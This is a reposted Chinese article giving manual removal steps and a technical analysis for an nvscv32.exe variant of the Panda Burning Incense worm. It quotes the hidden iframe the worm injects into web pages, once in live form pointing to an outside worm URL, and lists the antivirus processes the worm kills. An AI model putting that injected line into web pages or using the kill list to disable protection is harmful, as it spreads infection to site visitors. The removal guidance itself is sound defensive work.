熊猫烧香病毒nvscv32.exe变种手动清除方案

2008-02-23 07:07:16来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

编者按:PConline提供了一种针对熊猫烧香病毒nvscv32.exe变种的查杀办法。据调查此变种于16日出现。笔者有幸于17日与“熊猫烧香病毒nvscv32.exe变种”亲密接触,并用以下方法将其清除。推荐使用第一种方法。

相关链接:
熊猫烧香病毒专杀及手动修复方案》——适合病毒进程为:spoclsv.exe和FuckJacks.exe的读者。此文的病毒进程为:nvscv32.exe

一、PConline提供的解决方案

  1.拔网线;

  2.重新进入WinXP安全模式,熊猫烧香病毒进程没有加载,可使用“任务管理器”!(提示:开机后按住F8)

  3.删除病毒文件:%SystemRoot%\system32\drivers\nvscv32.exe。

  4.开始菜单=>运行,运行msconfig命令。在“系统配置实用程序”中,取消与nvscv32.exe相关的进程。也可使用超级兔子魔法设置、HijackThis等,删除nvscv32.exe的注册表启动项。

取消熊猫烧香病毒进程的启动

  5.下载并使用江民专杀工具,修复被感染的exe文件。并及时打上Windows补丁。

  6.清除html/asp/php等,所有网页文件中如下代码:(为防止传播代码有三处修改,请将“。”换为“.”)

  <iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”></iframe>

  批量清除恶意代码的方法:

  •   可使用Dreamweaver的批量替换。

Dreamweaver批理替换的使用方法

  •   可下载使用BatchTextReplacer批量替换。
  •   部署了Symantec AntiVirus的企业,升级到最新病毒库扫描全盘文件,即可清除被添加的恶意代码和清除病毒文件。

  7.用安装杀毒软件,并升级病毒库,扫描整个硬盘,清除其他病毒文件。推荐PConline多次推荐的“免费卡巴斯基”——Active Virus Sheild。(xxxxxxxxxxxxx)(注:步骤7不能与步骤5调换,以免可修复的带毒文件被删除!

  8.删除每个盘根目录下的autorun.inf文件,利用搜索功能,将Desktop_.ini全部删除。

二、互联安全网提供的解决方法(后文的病毒描述、中毒现象和技术分析均来自互联安全网)

  1:关闭网络共享,断开网络。

  2:使用IceSword结束掉nvscv32.exe进程(速度要快,抢在病毒感染IceSword前)

  3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
  Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1

  4:删除注册表启动项

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

  nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

  5:删除C:\WINDOWS\system32\drivers\nvscv32.exe

  6:删除每个盘根目录下的autorun.inf文件和setup.exe文件,利用搜索功能,将Desktop_.ini全部删除。

  7:如果电脑上有脚本文件,将病毒代码全部删除。

  8:关闭系统的自动播放功能。

  这样就基本上将病毒清除了。

三、病毒描述

  含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,并对局域网其他电脑进行扫描,同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。

  文件名称:nvscv32.exe
  病毒名称:目前各杀毒软件无法查杀(已经将病毒样本上报各杀毒厂商)
  中文名称:(尼姆亚,熊猫烧香)
  病毒大小:68,570 字节
  编写语言:Borland Delphi 6.0 - 7.0
  加壳方式:FSG 2.0 -> bart/xt
  发现时间:2007.1.16
  危害等级:高

四、中毒现象

  1:在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。

  2:无法手工修改“文件夹选项”将隐藏文件显示出来。

  3:在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16

  4:电脑上的所有脚本文件中加入以下代码:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

  5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

  6:不能正常使用任务管理器,SREng.exe等工具。

  7:无故的向外发包,连接局域网中其他机器。

五、技术分析

  1:病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe

  建立注册表自启动项:

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

  nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

  2:查找反病毒窗体病毒结束相关进程:

  •   天网防火墙
  •   virusscan
  •   symantec antivirus
  •   system safety monitor
  •   system repair engineer
  •   wrapped gift killer
  •   游戏木马检测大师
  •   超级巡警

  3:结束以下进程

  •   mcshield.exe
  •   vstskmgr.exe
  •   naprdmgr.exe
  •   updaterui.exe
  •   tbmon.exe
  •   scan32.exe
  •   ravmond.exe
  •   ccenter.exe
  •   ravtask.exe
  •   rav.exe
  •   ravmon.exe
  •   ravmond.exe
  •   ravstub.exe
  •   kvxp.kxp
  •   kvmonxp.kxp
  •   kvcenter.kxp
  •   kvsrvxp.exe
  •   kregex.exe

    标签:

    版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
    特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:计算机中的十二种常用密码破解法

下一篇:Windows系统下IE浏览器优化设置指南